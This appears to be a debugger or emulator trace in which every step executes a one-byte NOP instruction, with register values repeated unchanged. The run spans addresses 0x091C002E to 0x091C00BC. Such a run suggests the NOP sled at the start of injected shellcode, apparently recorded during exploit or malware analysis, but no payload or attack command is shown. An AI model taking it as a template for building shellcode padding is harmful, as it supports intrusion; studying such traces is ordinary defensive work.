eip = 91c002e esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C002E:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c002f esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C002F:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0030 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0030:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0031 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0031:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0032 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0032:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0033 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0033:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0034 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0034:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0035 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0035:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0036 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0036:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0037 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0037:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0038 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0038:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0039 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0039:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c003a esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C003A:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c003b esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C003B:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c003c esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C003C:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c003d esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C003D:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c003e esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C003E:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c003f esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C003F:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0040 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0040:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0041 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0041:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0042 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0042:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0043 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0043:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0044 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0044:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0045 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0045:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0046 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0046:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0047 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0047:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0048 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0048:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0049 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0049:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c004a esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C004A:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c004b esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C004B:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c004c esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C004C:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c004d esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C004D:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c004e esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C004E:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c004f esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C004F:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0050 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0050:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0051 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0051:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0052 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0052:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0053 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0053:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0054 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0054:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0055 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0055:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0056 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0056:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0057 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0057:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0058 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0058:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0059 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0059:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c005a esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C005A:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c005b esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C005B:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c005c esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C005C:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c005d esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C005D:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c005e esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C005E:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c005f esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C005F:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0060 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0060:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0061 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0061:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0062 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0062:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0063 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0063:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0064 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0064:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0065 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0065:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0066 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0066:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0067 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0067:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0068 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0068:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0069 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0069:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c006a esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C006A:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c006b esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C006B:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c006c esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C006C:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c006d esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C006D:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c006e esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C006E:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c006f esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C006F:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0070 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0070:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0071 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0071:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0072 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0072:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0073 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0073:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0074 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0074:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0075 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0075:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0076 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0076:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0077 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0077:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0078 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0078:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0079 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0079:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c007a esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C007A:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c007b esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C007B:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c007c esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C007C:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c007d esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C007D:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c007e esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C007E:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c007f esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C007F:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0080 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0080:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0081 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0081:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0082 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0082:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0083 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0083:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0084 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0084:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0085 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0085:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0086 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0086:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0087 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0087:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0088 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0088:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0089 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0089:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c008a esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C008A:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c008b esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C008B:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c008c esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C008C:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c008d esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C008D:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c008e esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C008E:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c008f esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C008F:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0090 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0090:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0091 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0091:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0092 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0092:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0093 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0093:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0094 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0094:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0095 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0095:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0096 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0096:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0097 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0097:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0098 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0098:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0099 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0099:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c009a esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C009A:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c009b esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C009B:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c009c esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C009C:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c009d esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C009D:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c009e esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C009E:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c009f esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C009F:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00a0 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00A0:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00a1 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00A1:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00a2 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00A2:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00a3 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00A3:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00a4 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00A4:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00a5 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00A5:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00a6 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00A6:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00a7 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00A7:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00a8 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00A8:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00a9 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00A9:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00aa esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00AA:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00ab esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00AB:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00ac esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00AC:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00ad esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00AD:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00ae esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00AE:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00af esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00AF:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00b0 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00B0:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00b1 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00B1:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00b2 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00B2:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00b3 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00B3:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00b4 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00B4:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00b5 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00B5:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00b6 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00B6:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00b7 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00B7:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00b8 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00B8:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00b9 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00B9:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00ba esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00BA:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00bb esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00BB:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c00bc esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C00BC:: 90 nop
